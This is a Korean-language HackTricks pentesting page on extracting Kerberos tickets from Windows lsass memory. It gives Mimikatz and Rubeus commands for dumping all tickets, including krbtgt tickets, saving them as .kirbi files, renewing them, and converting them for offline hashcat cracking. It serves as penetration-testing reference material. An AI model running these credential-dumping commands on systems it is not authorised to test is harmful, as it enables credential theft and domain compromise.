Korean - Ht
HackTricks Training Twitter Linkedin Sponsor

Harvesting tickets from Windows

HackTricks 지원하기

Windows의 티켓은 보안 정책을 처리하는 lsass (로컬 보안 권한 하위 시스템 서비스) 프로세스에 의해 관리되고 저장됩니다. 이러한 티켓을 추출하려면 lsass 프로세스와 인터페이스해야 합니다. 비관리 사용자만 자신의 티켓에 접근할 수 있으며, 관리자는 시스템의 모든 티켓을 추출할 수 있는 권한을 가집니다. 이러한 작업을 위해 MimikatzRubeus 도구가 널리 사용되며, 각각 다양한 명령과 기능을 제공합니다.

Mimikatz

Mimikatz는 Windows 보안과 상호작용할 수 있는 다목적 도구입니다. 티켓 추출뿐만 아니라 다양한 보안 관련 작업에도 사용됩니다.

# Extracting tickets using Mimikatz
sekurlsa::tickets /export

Rubeus

Rubeus는 Kerberos 상호작용 및 조작을 위해 특별히 설계된 도구입니다. 티켓 추출 및 처리뿐만 아니라 기타 Kerberos 관련 활동에 사용됩니다.

# Dumping all tickets using Rubeus
.\Rubeus dump
[IO.File]::WriteAllBytes("ticket.kirbi", [Convert]::FromBase64String("<BASE64_TICKET>"))

# Listing all tickets
.\Rubeus.exe triage

# Dumping a specific ticket by LUID
.\Rubeus.exe dump /service:krbtgt /luid:<luid> /nowrap
[IO.File]::WriteAllBytes("ticket.kirbi", [Convert]::FromBase64String("<BASE64_TICKET>"))

# Renewing a ticket
.\Rubeus.exe renew /ticket:<BASE64_TICKET>

# Converting a ticket to hashcat format for offline cracking
.\Rubeus.exe hash /ticket:<BASE64_TICKET>

이 명령어를 사용할 때는 <BASE64_TICKET><luid>와 같은 자리 표시자를 실제 Base64 인코딩된 티켓 및 로그온 ID로 각각 교체해야 합니다. 이러한 도구는 티켓 관리 및 Windows의 보안 메커니즘과 상호 작용하는 데 광범위한 기능을 제공합니다.

References

Support HackTricks
Previous88tcp/udp - Pentesting KerberosNextHarvesting tickets from Linux

Last updated